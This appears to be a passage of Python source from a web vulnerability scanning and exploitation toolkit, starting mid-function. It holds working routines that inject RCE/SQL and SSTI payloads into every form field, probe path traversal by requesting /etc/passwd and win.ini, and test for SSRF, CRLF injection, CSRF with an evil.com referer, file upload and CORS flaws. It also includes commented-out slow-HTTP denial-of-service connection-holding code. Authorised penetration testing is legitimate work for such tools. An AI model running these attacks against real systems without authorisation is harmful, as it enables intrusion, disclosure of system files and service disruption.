   if based_on_o.lower()=="file":
     based_on=("file",random_string(random.randint(3,10)))
   else:
     based_on=("time",int(delay))
   xp=xp.format(based_on[1])
   xp+=code_operator_right
  else:
   xp+=sql_operator_left
   inject_type=list(injection.keys())[0]
   inject_target=injection[inject_type]
   xp+=payloads[inject_type.lower()][inject_target.lower()][based_on.lower()][payload_index]
   if based_on_o.lower()=="file":
     based_on=("file",random_string(random.randint(3,10)))
   else:
     based_on=("time",int(delay))
   xp=xp.format(based_on[1])
   xp+=sql_operator_right
  target_page=u
  form_index=-1
  if proxy:
   proxy=proxy
  if proxies:
   proxy=random.choice(proxies)
  dic={}
  if logs==True:
   print(Fore.WHITE+"[~]Getting forms..."+Style.RESET_ALL)
  hu=True
  fom=forms_parser(u,proxy=proxy,timeout=timeout,cookie=cookie,user_agent=user_agent)
  if len(fom)==0:
   if logs==True:
    print(Fore.RED+"[-]No forms were found!!!"+Style.RESET_ALL)
   hu=False
  if hu==True:
   for l1 in fom:
    form_index+=1
    lst={}
    vul=[]
    sec=[]
    hu=True
    u=l1['action']
    if logs==True:
     print(Fore.BLUE+"Form: "+Fore.WHITE+str(form_index)+Fore.BLUE+"\nAction: "+Fore.WHITE+u+Fore.BLUE+"\nMethod: "+Fore.WHITE+l1['method']+Fore.BLUE+"\nPayload: "+Fore.WHITE+xp.replace(" {} ".format(int(delay)+2)," {} ".format(int(delay)))+Style.RESET_ALL)
     """if len(inputs(u,proxy=proxy,timeout=timeout,value=True,cookie=cookie,user_agent=user_agent))==0:
     if logs==True:
      print(Fore.YELLOW+"[-]No parameters found on that page !! Moving on.."+Style.RESET_ALL)"""
    if True:
     extr=[]
     l=[]
     for x in l1['inputs']:
      if x["name"].strip() not in leave_empty and x["name"].strip() not in dont_send:
       try:
        if x["type"] in ["hidden","file","text","textarea","email","tel","search","url","password","number","select","radio","checkbox"]:#any input type that accept direct input from keyboard
         i=x["name"]
         parsed_form=set_up_injection(target_page,form_index,i,xp,cookie,setup_ua(user_agent),setup_proxy(proxy,proxies),timeout,fill_empty,file_extension=file_extension,leave_empty=leave_empty,dont_send=dont_send,mime_type=mime_type)
         _res=rce_submit(parsed_form,xp,based_on,replaceble_parameters,debug=debug,enctype=l1['enctype'],type_injection=list(injection.keys())[0])
         if _res[0]==True:
           x="parameter: '"+i+"' => [+] Vulnerable !!"
           vul.append((i,_res[1]))
           colr=Fore.GREEN
         else:
          x="parameter: '"+i+"' => [-] Not Vulnerable"
          sec.append(i)
          colr=Fore.RED
         if logs==True:
          print (colr+x+Style.RESET_ALL)
       except Exception as ex:
        break
    dic.update({form_index:{"Action":u,"Method":l1['method'],"Passed":vul,"Failed":sec}})
   if based_on_o=="time":
    final={"Payload":xp.replace(" {} ".format(int(delay)+2)," {} ".format(int(delay))),"Based on":based_on_o,"Injection":injection,"Page":target_page,"Output":dic}
   else:
    final={"Payload":xp,"Based on":based_on_o,"Injection":injection,"Page":target_page,"Output":dic}
   if save_to_file:
    with open(save_to_file.split('.')[0]+".json", 'w') as outfile:
     json.dump(final, outfile, indent=4)
    outfile.close() 
   return final
   




def ssti_submit(parsed,payload,replaceble_parameters,debug=False,enctype='application/x-www-form-urlencoded',eval_value=1111111101):
  '''
   this function is for xss test with GET requests.
  '''
  d,fi=setup_to_submit(parsed[0])
  for x in d:
   for y in replaceble_parameters:
    if x==y:
     for z in replaceble_parameters[y]:
      d[x]=d[x].replace(z[0],z[1])
  if debug==True:
   for x in d:
    print("{}{} : {}{}".format(Fore.MAGENTA,x,Fore.WHITE,d[x]))
   for x in fi:
    print("{}{} : {}{}".format(Fore.MAGENTA,x,Fore.WHITE,fi[x]))
  if 'application/json' in enctype:
   d=json.dumps(d)
  if not fi:
   parsed[1].update({"Content-Type":enctype,"Referer":parsed[0]["action"],"Origin":parsed[0]["action"].split("://")[0]+"://"+parsed[0]["action"].split("://")[1].split("/")[0]})
  else:
   parsed[1].update({"Referer":parsed[0]["action"],"Origin":parsed[0]["action"].split("://")[0]+"://"+parsed[0]["action"].split("://")[1].split("/")[0]})
  if parsed[0]["method"]=="get":
   try:
     c=requests.get(parsed[0]["action"], params= d,headers = parsed[1],proxies=parsed[2],timeout=parsed[3], verify=False).text
     if "{}".format(eval_value) in c:
        return (True, (payload,"{}".format(eval_value)))
   except Exception as e:
    pass
  else:
   try:
     c=requests.post(parsed[0]["action"], data= d,files=fi,headers = parsed[1],proxies=parsed[2],timeout=parsed[3], verify=False).text
     if "{}".format(eval_value) in c:
        return (True, (payload,"{}".format(eval_value)))
   except Exception as e:
    pass
  return (False,'')


def safe_eval(a,o,b):
 if a.strip().isnumeric()==False or b.strip().isnumeric()==False:
  raise Exception("For security reasons, ONLY NUMERIC VALUES ARE EVALUATED !!")
 if o.strip() not in ["+","-","*","/"]:
  raise Exception("For security reasons, ONLY OPERATORS ALLOWED ARE: + , - , * , /!!")
 return eval(a+o+b)


def ssti_forms(u,payload_index=0,values=(9,123456789),operator="*",save_to_file=None,file_extension='png',replaceble_parameters={"phpvalue":((".",""),)},logs=True,fill_empty=10,leave_empty=[],dont_send=['btnClear'],proxy=None,proxies=None,timeout=120,user_agent=None,cookie=None,debug=False,mime_type=None):
  '''
   this function is for RCE test with both POST and GET requests. it extracts the input fields names using the "inputs" function then test each input using POST and GET methods.
   usage:
  
   >>>import bane
   >>>bane.rce('http://phptester.net/")
  '''
  target_page=u
  xp=ssti_list[payload_index]%{"payload":"{}{}{}".format(values[0],operator,values[1])}
  xp_eval=safe_eval("{}".format(values[0]),operator,"{}".format(values[1]))
  target_page=u
  form_index=-1
  if proxy:
   proxy=proxy
  if proxies:
   proxy=random.choice(proxies)
  dic={}
  if logs==True:
   print(Fore.WHITE+"[~]Getting forms..."+Style.RESET_ALL)
  hu=True
  fom=forms_parser(u,proxy=proxy,timeout=timeout,cookie=cookie,user_agent=user_agent)
  if len(fom)==0:
   if logs==True:
    print(Fore.RED+"[-]No forms were found!!!"+Style.RESET_ALL)
   hu=False
  if hu==True:
   for l1 in fom:
    form_index+=1
    lst={}
    vul=[]
    sec=[]
    hu=True
    u=l1['action']
    if logs==True:
     print(Fore.BLUE+"Form: "+Fore.WHITE+str(form_index)+Fore.BLUE+"\nAction: "+Fore.WHITE+u+Fore.BLUE+"\nMethod: "+Fore.WHITE+l1['method']+Fore.BLUE+"\nPayload: "+Fore.WHITE+xp+Style.RESET_ALL)
     """if len(inputs(u,proxy=proxy,timeout=timeout,value=True,cookie=cookie,user_agent=user_agent))==0:
     if logs==True:
      print(Fore.YELLOW+"[-]No parameters found on that page !! Moving on.."+Style.RESET_ALL)"""
    if True:
     extr=[]
     l=[]
     for x in l1['inputs']:
      if x["name"].strip() not in leave_empty and x["name"].strip() not in dont_send:
       try:
        if x["type"] in ["hidden","file","text","textarea","email","tel","search","url","password","number","select","radio","checkbox"]:#any input type that accept direct input from keyboard
         i=x["name"]
         parsed_form=set_up_injection(target_page,form_index,i,xp,cookie,setup_ua(user_agent),setup_proxy(proxy,proxies),timeout,fill_empty,file_extension=file_extension,leave_empty=leave_empty,dont_send=dont_send,mime_type=mime_type)
         _res=ssti_submit(parsed_form,xp,replaceble_parameters,debug=debug,enctype=l1['enctype'],eval_value=xp_eval)
         if _res[0]==True:
           x="parameter: '"+i+"' => [+] Vulnerable !!"
           vul.append((i,_res[1]))
           colr=Fore.GREEN
         else:
          x="parameter: '"+i+"' => [-] Not Vulnerable"
          sec.append(i)
          colr=Fore.RED
         if logs==True:
          print (colr+x+Style.RESET_ALL)
       except Exception as ex:
        break
    dic.update({form_index:{"Action":u,"Method":l1['method'],"Passed":vul,"Failed":sec}})
   final={"Payload":xp,"Page":target_page,"Output":dic}
   if save_to_file:
    with open(save_to_file.split('.')[0]+".json", 'w') as outfile:
     json.dump(final, outfile, indent=4)
    outfile.close() 
   return final
   




def valid_parameter(parm):
 try:
  float(parm)
  return False
 except:
  return True

def path_traversal_check(u,php_wrapper="file",linux_file=0,null_byte=False,bypass=False,target_os="linux",proxy=None,proxies=None,timeout=10,user_agent=None,cookie=None):
 '''
   this function is for FI vulnerability test using a link
'''
 linux_files=["{}proc{}version","{}etc{}passwd"]
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if proxies:
  prx=random.choice(proxies)
  proxy={'http':'http://'+prx,'https':'http://'+prx}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 if ("=" not in u):
  return (False,'')
 else:
  if target_os.lower()=="linux":
   l=linux_files[linux_file]
  else:
   l='c:{}windows{}win.ini'
  if bypass==True:
   l=l.format("./"*random.randint(1,5),"./"*random.randint(1,5))
  else:
   l=l.format("/"*random.randint(1,5),"/"*random.randint(1,5))
  if php_wrapper:
   l=''.join(random.choice((str.upper, str.lower))(c) for c in php_wrapper)+"://"+l
  if null_byte==True:
   l+="%00"
  try:
    r=requests.get(u.format(l),headers=heads,proxies=proxy,timeout=timeout, verify=False)
    if (len(re.findall(r'[a-zA-Z0-9_]*:[a-zA-Z0-9_]*:[\d]*:[\d]*:[a-zA-Z0-9_]*:/', r.text))>0) or (all( x in r.text for x in ["; for 16-bit app support","[fonts]","[extensions]","[mci extensions]","[files]","[Mail]"])==True) or (all( x in r.text for x in ["Linux version","(gcc version"])==True):
     return (True,r.url)
  except Exception as e:
    pass
 return (False,'')
 
def path_traversal_url(u,null_byte=False,bypass=False,target_os="linux",php_wrapper="file",proxy=None,proxies=None,timeout=10,user_agent=None,cookie=None): 
 res=[]
 if u.split("?")[0][-1]!="/" and '.' not in u.split("?")[0].rsplit('/', 1)[-1]:
    u=u.replace('?','/?')
 a=crawl(u,proxy=proxy,timeout=timeout,cookie=cookie,user_agent=user_agent)
 l=[]
 d=a.values()
 for x in d:
  if len(x[3])>0:
   l.append(x)
 o=[]
 for x in l:
  ur=x[1]
  if ur.split("?")[0] not in o:
   o.append(ur.split("?")[0])
   if ur.split("?")[0][-1]!="/" and '.' not in ur.split("?")[0].rsplit('/', 1)[-1]:
    ur=ur.replace('?','/?')
   for y in x[3]:
    if valid_parameter(y[1])==True:
     trgt=ur.replace(y[0]+"="+y[1],y[0]+"={}")
     q=path_traversal_check(trgt,null_byte=null_byte,bypass=bypass,linux_file=0,target_os="linux",php_wrapper=php_wrapper,proxy=proxy,proxies=proxies,timeout=timeout,cookie=cookie,user_agent=user_agent)
     if q[0]==True:
      if q[1] not in res:
        res.append(q[1])
     else:
      q=path_traversal_check(trgt,null_byte=null_byte,bypass=bypass,linux_file=1,target_os="linux",php_wrapper=php_wrapper,proxy=proxy,proxies=proxies,timeout=timeout,cookie=cookie,user_agent=user_agent)
      if q[0]==True:
        if q[1] not in res:
         res.append(q[1])
      else:
        q=path_traversal_check(trgt,null_byte=null_byte,bypass=bypass,php_wrapper=php_wrapper,proxy=proxy,proxies=proxies,timeout=timeout,cookie=cookie,user_agent=user_agent,target_os="windows")
        if q[0]==True:
         if q[1] not in res:
          res.append(q[1])
 return res
 

def ssrf_check(u,null_byte=False,link="http://www.google.com",signature="<title>Google</title>",proxy=None,proxies=None,timeout=25,user_agent=None,cookie=None):
 '''
   this function is for FI vulnerability test using a link
'''
 l=link
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if proxies:
  prx=random.choice(proxies)
  proxy={'http':'http://'+prx,'https':'http://'+prx}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 if ("=" not in u):
  return (False,'')
 if null_byte==True:
   l+="%00"
 try:
    r=requests.get(u.format(l),headers=heads,proxies=proxy,timeout=timeout, verify=False)
    if (signature in r.text) or (r.status_code==504):
     return (True,r.url)
 except Exception as e:
    if "Read timed out" in str(e):
     return (True,u.format(l))
 return (False,'')


def ssrf_url(u,null_byte=False,link="http://www.google.com",timeout=120,signature="<title>Google</title>",proxy=None,proxies=None,user_agent=None,cookie=None): 
 res=[]
 if u.split("?")[0][-1]!="/" and '.' not in u.split("?")[0].rsplit('/', 1)[-1]:
    u=u.replace('?','/?')
 a=crawl(u,proxy=proxy,timeout=timeout,cookie=cookie,user_agent=user_agent)
 l=[]
 d=a.values()
 for x in d:
  if len(x[3])>0:
   l.append(x)
 o=[]
 for x in l:
  ur=x[1]
  if ur.split("?")[0] not in o:
   o.append(ur.split("?")[0])
   if ur.split("?")[0][-1]!="/" and '.' not in ur.split("?")[0].rsplit('/', 1)[-1]:
    ur=ur.replace('?','/?')
   for y in x[3]:
    if valid_parameter(y[1])==True:
     trgt=ur.replace(y[0]+"="+y[1],y[0]+"={}")
     q=ssrf_check(trgt,null_byte=null_byte,proxy=proxy,link=link,signature=signature,proxies=proxies,timeout=timeout,cookie=cookie,user_agent=user_agent)
     if q[0]==True:
      if q[1] not in res:
        res.append(q[1])
 return res


def clickjacking(u,proxy=None,timeout=10,user_agent=None,cookie=None,debug=False):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 try:
  r=requests.get(u,headers=heads,proxies=proxy,timeout=timeout,verify=False).headers
  click=True
  for x in r:
   if x.lower().strip()=='x-frame-options' or x.lower().strip()=='content-security-policy':
     click=False
   if debug==True:
    print(x+" : "+r[x])
 except:
  return False
 return click



def set_requests(u,method="GET",data={},files={},params={},headers={},proxy={},timeout=15):
 s = requests.Session()
 req = requests.Request(method=method ,url=u, headers=headers, data=data, files=files,params=params)
 prep = req.prepare()
 prep.url = u
 return s.send(prep, verify=False,proxies=proxy,timeout=timeout)
 


def crlf_unicode_encode(random_level=0,line_feed_only=False,carriage_return_only=False):
 if line_feed_only==False and carriage_return_only==False:
  if random_level==1:
   return random.choice(['%E5%98%8D','%0d'])+random.choice(['%E5%98%8A','%0a'])
  if random_level==2:
   return "%E5%98%8D%E5%98%8A"
  else:
   return '%0d%0a'
 else:
  if line_feed_only==True and carriage_return_only==False:
   if random_level==1:
    return random.choice(['%E5%98%8A','%0a'])
   if random_level==2:
    return "%E5%98%8A"
   else:
    return '%0a'
  if carriage_return_only==True and line_feed_only==False:
   if random_level==1:
    return random.choice(['%E5%98%8D','%0d'])
   if random_level==2:
    return "%E5%98%8D"
   else:
    return '%0d'
 return '%0d%0a'



def crlf_header_injection(u,unicode_random_level=0,carriage_return_only=False,line_feed_only=False,proxy=None,timeout=10,user_agent=None,cookie=None,debug=False):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 try:
  r=set_requests(u+crlf_unicode_encode(random_level=unicode_random_level,carriage_return_only=carriage_return_only)+'banetest:%20test',method='GET',headers=heads,proxy=proxy,timeout=timeout)
  return 'banetest' in r.headers
 except Exception as e:
  pass
 return False



 
def crlf_body_injection(u,proxy=None,unicode_random_level=0,carriage_return_only=False,line_feed_only=False,timeout=10,user_agent=None,cookie=None,debug=False):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 try:
  r=set_requests(u+crlf_unicode_encode(random_level=unicode_random_level,carriage_return_only=carriage_return_only)+crlf_unicode_encode(random_level=unicode_random_level,carriage_return_only=carriage_return_only)+'banetest:%20test',method='GET',headers=heads,proxy=proxy,timeout=timeout)
  return 'banetest;$@*' in r.text
 except Exception as e:
  pass
 return False




def hsts(u,proxy=None,timeout=10,user_agent=None,cookie=None,debug=False):
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 if '://' in u:
  u=u.split('://')[1]
 try:
  r=requests.get('https://'+u,headers=heads,proxies=proxy,timeout=timeout,verify=False).headers
  hs=True
  for x in r:
   if x.lower().strip()=='strict-transport-security':
     hs=False
   if debug==True:
    print(x+" : "+r[x])
 except Exception as e:
  return False
 return hs



def csrf_filter_tokens(u,proxy=None,timeout=10,user_agent=None,cookie=None):
 if not cookie or len(cookie.strip())==0:
  raise Exception("This attack requires authentication !! You need to set a Cookie")
 res={"Vulnerable":[],"Safe":[]}
 f=forms_parser(u,timeout=timeout,user_agent=user_agent,cookie=cookie,proxy=proxy)
 f1=forms_parser(u,timeout=timeout,user_agent=user_agent,cookie=cookie,proxy=proxy)
 coun=-1
 for x in f:
  coun+=1
  vuln=True
  hd_v=False
  #print(Fore.BLUE+"Form: "+Fore.WHITE+str(f.index(x))+Fore.BLUE+"\nAction: "+Fore.WHITE+x['action']+Fore.BLUE+"\nMethod: "+Fore.WHITE+x['method']+Style.RESET_ALL)
  for y in x["inputs"]:
   #print("Name: {} | Type: {} | Value: {}".format(y["name"],y["type"],y["value"]))
   if y["type"].lower()=="hidden":
    hd_v=True
   if y["type"].lower()=="hidden" and any(ele in y["name"].lower() for ele in csrf_strings):#and y["value"]==f1f["inputs"][con]["value"]:
    vuln=False
  if vuln==True:
   if hd_v==True:#if there is no Anti-CSRF Tokens then we check if the Hidden fields can be predicted or not (keep their values or change them by request)
    #print(Fore.YELLOW+"[i] Validating hidden values' prediction..."+Style.RESET_ALL)
    for i in x["hidden_values"]:
     if len(x["hidden_values"][i])>0:
      if x["hidden_values"][i]!=f1[coun]["hidden_values"][i]:
       vuln=False
  if vuln==True:
   colr=Fore.GREEN
   """if logs==True:
    print (colr+"[+] Vulnerable"+Style.RESET_ALL)"""
   res["Vulnerable"].append(x)
  else:
   colr=Fore.RED
   """if logs==True:
    print (colr+"[-] Not vulnerable"+Style.RESET_ALL)"""
   res["Safe"].append(x)
 return res




def csrf_forms(u,proxy=None,timeout=10,show_warnings=True,user_agent=None,cookie=None,replaceble_parameters={"phpvalue":((".",""),)},file_extension='png',fill_empty=10,referer="http://www.evil.com",leave_empty=[],dont_send=[],mime_type=None):
 vu=[]
 if not cookie or len(cookie.strip())==0:
  raise Exception("This attack requires authentication !! You need to set a Cookie")
 v=csrf_filter_tokens(u,proxy=proxy,timeout=timeout,user_agent=user_agent,cookie=cookie)["Vulnerable"]
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
  h={"User-Agent":user_agent}
 else:
  h={"User-Agent":random.choice(ua)}
 h.update({"cookie":cookie})
 h.update({"Referer":referer,"Origin":referer.split("://")[0]+"://"+referer.split("://")[1].split("/")[0]})
 for x in v:
  x=form_filler(x,"","",file_extension=file_extension,auto_fill=fill_empty,leave_empty=leave_empty,dont_send=dont_send,mime_type=mime_type)
  d,f=setup_to_submit(x)
  for g in d:
   for y in replaceble_parameters:
    if x==y:
     for z in replaceble_parameters[y]:
      d[g]=d[g].replace(z[0],z[1])
  l=[d[y] for y in d]
  for j in f:
   l.append(f[j][0])
  if x["method"]=="get":
   r=requests.get(x["action"],params=d,proxies=proxy,timeout=timeout,headers=h)
  else:
   if 'application/json' in x["enctype"]:
    d=json.dumps(d)
   r=requests.post(x["action"],data=d,files=f,proxies=proxy,timeout=timeout,headers=h)
  if all(i in r.text for i in l):
    vu.append(x)
  elif r.status_code==200 and any(i in r.text for i in l):
   vu.append(x)
   if show_warnings==True:
    print("Warning: HTTP Status Code: 200 , but we didn't find some of our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again")
  elif r.status_code==200 and not any(i in r.text for i in l):
   if show_warnings==True:
    print("Warning: HTTP Status Code: 200 , but we didn't find any of our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again")
   vu.append(x)
 return vu


def file_upload(u,proxy=None,timeout=10,show_warnings=True,user_agent=None,cookie=None,replaceble_parameters={"phpvalue":((".",""),)},file_extension='png',fill_empty=10,referer=None,leave_empty=[],dont_send=[],mime_type=None):
 l=[]
 x=forms_parser(u,proxy=proxy,timeout=timeout,user_agent=user_agent,cookie=cookie)
 fo=get_upload_form(x)
 d,f=setup_to_submit(form_filler(fo,'','',mime_type=mime_type))
 for x in d:
   for y in replaceble_parameters:
    if x==y:
     for z in replaceble_parameters[y]:
      d[x]=d[x].replace(z[0],z[1])
 if not referer or len(referer)==0:
  referer=u
 for j in f:
   l.append(f[j][0])
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
  h={"User-Agent":user_agent}
 else:
  h={"User-Agent":random.choice(ua)}
 if 'application/json' in fo["enctype"]:
    d=json.dumps(d)
 h.update({"cookie":cookie})
 h.update({"Referer":referer,"Origin":referer.split("://")[0]+"://"+referer.split("://")[1].split("/")[0]})
 try:
  r=requests.post(fo["action"],data=d,files=f,proxies=proxy,timeout=timeout,headers=h)
  if all(i in r.text for i in l):
    return True
  elif r.status_code==200 and any(i in r.text for i in l):
   if show_warnings==True:
    print("Warning: HTTP Status Code: 200 , but we didn't find some of our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again")
   return True
  elif r.status_code==200 and not any(i in r.text for i in l):
   if show_warnings==True:
    print("Warning: HTTP Status Code: 200 , but we didn't find our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again")
   return True
 except:
  pass
 return False




def cors_reflection(u,proxy=None,timeout=10,user_agent=None,cookie=None,origin="www.evil-domain.com",debug=False,fill=10):
 a=None
 b=None
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 heads.update({"Origin":origin})
 try:
  r=requests.get(u,headers=heads,proxies=proxy,timeout=timeout,verify=False).headers
  a=r.get("Access-Control-Allow-Origin",None)
  b=r.get("Access-Control-Allow-Credentials",None)
  if debug==True:
   for x in r:
    print(x+" : "+r[x])
  if a and b:
   if a==origin and b=="true":
    return (True,{"Access-Control-Allow-Origin":a,"Access-Control-Allow-Credentials":b})
 except:
  pass
 return (False,{"Access-Control-Allow-Origin":a,"Access-Control-Allow-Credentials":b})
 
def cors_wildcard(u,proxy=None,timeout=10,user_agent=None,cookie=None,debug=False):
 a=None
 b=None
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 heads.update({"Origin":"*"})
 try:
  r=requests.get(u,headers=heads,proxies=proxy,timeout=timeout,verify=False).headers
  a=r.get("Access-Control-Allow-Origin",None)
  b=r.get("Access-Control-Allow-Credentials",None)
  if debug==True:
   for x in r:
    print(x+" : "+r[x])
  if a and b:
   if a=="*" and b=="true":
    return (True,{"Access-Control-Allow-Origin":a,"Access-Control-Allow-Credentials":b})
 except:
  pass
 return (False,{"Access-Control-Allow-Origin":a,"Access-Control-Allow-Credentials":b})

def cors_null(u,proxy=None,timeout=10,user_agent=None,cookie=None,debug=False):
 a=None
 b=None
 if proxy:
  proxy={'http':'http://'+proxy,'https':'http://'+proxy}
 if user_agent:
   us=user_agent
 else:
   us=random.choice(ua)
 if cookie:
    heads={'User-Agent': us,'Cookie':cookie}
 else:
   heads={'User-Agent': us}
 heads.update({"Origin":"null"})
 try:
  r=requests.get(u,headers=heads,proxies=proxy,timeout=timeout,verify=False).headers
  a=r.get("Access-Control-Allow-Origin",None)
  b=r.get("Access-Control-Allow-Credentials",None)
  if debug==True:
   for x in r:
    print(x+" : "+r[x])
  if a and b:
   if a=="null" and b=="true":
    return (True,{"Access-Control-Allow-Origin":a,"Access-Control-Allow-Credentials":b})
 except:
  pass
 return (False,{"Access-Control-Allow-Origin":a,"Access-Control-Allow-Credentials":b})

def proxies_select(proxy,proxies):
 if proxy:
   return proxy
 if proxies:
   return random.choice(proxies)
 return None

def cors_misconfigurations(u,origin="www.evil-domain.com",origin_reflection=True,wildcard_origin=True,null_origin=True,proxy=None,proxies=None,timeout=10,user_agent=None,cookie=None,logs=True,debug=False):
 res={}
 if origin_reflection==True:
  if logs==True:
   print("[*] Testing for: Origin Reflection...")
  tes1=cors_reflection(u,origin=origin,cookie=cookie,user_agent=user_agent,timeout=timeout,proxy=proxies_select(proxy,proxies),debug=debug)
  if tes1[0]==True:
   res.update({"cors_reflection":tes1[1]})
   if logs==True:
    print("[+] Vulnerable !!")
  else:
   res.update({"cors_reflection":tes1[1]})
   if logs==True:
    print("[-] Not vulnerable")
 if wildcard_origin==True:
  if logs==True:
   print("[*] Testing for: Wildcard Origin...")
  tes2=cors_wildcard(u,cookie=cookie,user_agent=user_agent,timeout=timeout,proxy=proxies_select(proxy,proxies),debug=debug)
  if tes2[0]==True:
   res.update({"wildcard_origin":tes2[1]})
   if logs==True:
    print("[+] Vulnerable !!")
  else:
   res.update({"wildcard_origin":tes2[1]})
   if logs==True:
    print("[-] Not vulnerable")
 if origin_reflection==True:
  if logs==True:
   print("[*] Testing for: Null Origin...")
  tes3=cors_null(u,cookie=cookie,user_agent=user_agent,timeout=timeout,proxy=proxies_select(proxy,proxies),debug=debug)
  if tes3[0]==True:
   res.update({"null_origin":tes3[1]})
   if logs==True:
    print("[+] Vulnerable !!")
  else:
   res.update({"null_origin":tes3[1]})
   if logs==True:
    print("[-] Not vulnerable")
 return res

"""
'''
  the following functions are used to check any kind of Slow HTTP attacks vulnerabilities that will lead to a possible DoS.
'''

def build_get(u,p,timeout=5):
    s =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    s.connect((u,p))
    if ((p==443 ) or (p==8443)):
     s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
    s.send("GET {} HTTP/1.1\r\n".format(random.choice(paths)).encode("utf-8"))
    s.send("User-Agent: {}\r\n".format(random.choice(ua)).encode("utf-8"))
    s.send("Accept-language: en-US,en,q=0.5\r\n".encode("utf-8"))
    s.send("Connection: keep-alive\r\n".encode("utf-8"))
    return s

def headers_timeout_test(u,port=80,timeout=5,max_timeout=30,logs=True):
 i=0
 if logs==True:
  print("[*]Test has started:\nTarget: {}\nPort: {}\nInitial connection timeout: {}\nMax interval: {}".format(u,port,timeout,max_timeout))
 try:
  s=build_get(u,port,timeout=timeout)
  i+=1
 except:
  if logs==True:
   print("[-]Connection failed")
  return 0
 if i>0:
  j=0
  while True:
   try:
    j+=1
    if j>max_timeout:
     break
    if logs==True:
     print("[*]Sending payload...")
    s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
    if logs==True:
     print("[+]Sleeping for {} seconds...".format(j))
    time.sleep(j)
   except:
    if logs==True:
     print("==>timed out at: {} seconds".format(j))
     break
    return j
  if j>max_timeout:
   if logs==True:
    print("==>Test has reached the max interval: {} seconds without timing out".format(duration))
   return j

def slow_get_test(u,port=80,timeout=5,interval=5,randomly=False,duration=180,logs=True,min_wait=1,max_wait=5):
 i=0
 if logs==True:
  print("[*]Test has started:\nTarget: {}\nPort: {}\nInitial connection timeout: {}\nInterval between packets:{}\nTest duration: {} seconds".format(u,port,timeout,interval,duration))
 try:
  s=build_get(u,port,timeout=timeout)
  i+=1
 except:
  if logs==True:
   print("[-]Connection failed")
  return 0
 if i>0:
  j=time.time()
  while True:
   try:
    ti=time.time()
    if int(ti-j)>=duration:
     break
    if logs==True:
     print("[*]Sending payload...")
    s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
    t=interval
    if randomly==True:
     t=random.randint(min_wait,max_wait)
    if logs==True:
     print("[+]Sleeping for {} seconds...".format(t))
    time.sleep(t)
   except Exception as e:
    pass
    if logs==True:
     print("==>timed out at: {} seconds".format(int(ti-j)))
    return int(ti-j)
    break
  if int(ti-j)>=duration:
   if logs==True:
    print("==>Test has reached the max interval: {} seconds without timing out".format(duration))
   return int(ti-j)

def max_connections_limit(u,port=80,connections=150,timeout=5,duration=180,logs=True,payloads=True):
 l=[]
 if logs==True:
  print("[*]Test has started:\nTarget: {}\nPort: {}\nConnections to create: {}\nInitial connection timeout: {}\nTest duration: {} seconds".format(u,port,connections,timeout,duration))
 ti=time.time()
 while True:
  if int(time.time()-ti)>=duration:
   if logs==True:
    print("[+]Maximum time for test has been reached!!!")
    break
   return len(l)
  if len(l)==connections:
   if logs==True:
    print("[+]Maximum number of connections has been reached!!!")
   if returning==True:
    return connections 
   break
  try:
   so=build_get(u,port,timeout=timeout)
   l.append(so)
  except Exception as e:
   pass
  if payloads==True:
   for s in l:
    try:
     s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
    except:
     l.remove(s)
  if logs==True:
   print("[!]Sockets: {} Time: {} seconds".format(len(l),int(time.time()-ti)))

def build_post(u,p,timeout=5,size=10000):
 s =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.settimeout(timeout)
 s.connect((u,p))
 if ((p==443 ) or (p==8443)):
  s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
 s.send("POST {} HTTP/1.1\r\nUser-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: {}\r\n\r\n".format(random.choice(paths),random.choice(ua),random.randint(300,1000),size,u).encode("utf-8"))
 return s

